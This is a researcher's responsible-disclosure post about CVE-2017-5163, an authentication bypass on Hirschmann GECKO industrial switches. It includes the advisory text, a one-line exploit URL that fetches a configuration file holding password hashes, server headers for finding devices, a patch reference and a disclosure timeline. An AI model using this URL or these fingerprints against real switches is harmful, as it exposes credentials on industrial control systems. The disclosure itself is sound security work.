[0day] Authentication Bypass on Belden Hirschmann GECKO switches   Mise à jour récente !


Abstract

Last summer during a pentest for a client we came across industrial switches made by Hirschmann, “a Belden Brand, (which) provides the industry with leading Ethernet networking technology and sets the industrial networking standards for quality, reliability and service.” (Source: http://www.belden.com/aboutbelden/brands/Hirschmann.cfm ) and found a few unknown vulnerabilities (0day) affecting version 2.0.00 and prior versions. We’ve choose to “responsible disclose” them, directly to Hirschmann and the ICS-CERT (Industrial Control Systems Cyber Emergency Response Team). Since then a new firmware has been released (2.0.01) to patch one of them (the most critical). ICS-CERT has released an advisory and a CVE (CVE-2017-5163) has been assigned.

Many thanks to Hirschmann and the ICS-CERT teams.

Advisories

« (…) After an administrator downloads a configuration file, a copy of the configuration file, which includes hashes of user passwords, is saved to a location that is accessible without authentication. (…) ».

https://ics-cert.us-cert.gov/advisories/ICSA-17-026-02A

https://www.belden.com/resourcecenter/security/upload/Belden-Security-Bulletin-BSECV-2016-5.pdf

https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-5163

 

Exploit

As simple as:

https://ip/download/config_download?download=config.bin

 

Mitigation

Belden has released a new software version, Version 02.0.01, to address the identified vulnerability, which is available at the following location:

https://www.e-catalog.beldensolutions.com/link/57078-24455-402707-402708/en/conf/0

 

In the wild

As this is an industrial switch it should not be connected directly to Internet and searchs on Google or Shodan shouldn’t give any results.

But if needed here is the http headers:

HTTP/1.1 200 OK
Server: libCWebUI
Accept-Ranges: bytes
Content-Length: 5823
Content-Type: text/html
Connection: close

(...)

GECKO 4TX</title>

 

Timeline

2016/07/14         First contact by mail

2016/07/14         Full report sent by mail to Hirschmann –> they start investigation

2016/09/07         Hirschmann phone call -> they work on a fix

2016/10/11         Hirschmann mail: “The new firmware release candidate passed internal tests and we are going to finalize it soon and publish the new release together with a Security Bulletin mentioning your efforts as key to the whole release.

2016/10/11         Hirschmann mail with a link to the RC of their new firmware and a “Security Bulletin” which says: “The user authentication for downloading the configuration file can be bypassed after a user with administrator privileges downloads the configuration file.

2016/10/12         Answer to Hirschmann to ask if the other vulnerabilities have been taken into account

2016/11/18         Answer of Hirschmann : “We are expecting the Final version of the Firmware in the next couple of days, after which we will follow a quick release process. We will release this version together with the security announcement mentioning your discovery and assistance. The additional issues you reported will be assesed again and we will discuss when or if they will be included.”

2016/11/24         Full report sent to ICS-CERT

2016/12/14         New firmware released (2.0.1)

2016/12/19         Belden advisory released

2017/01/26        ICS-CERT advisory released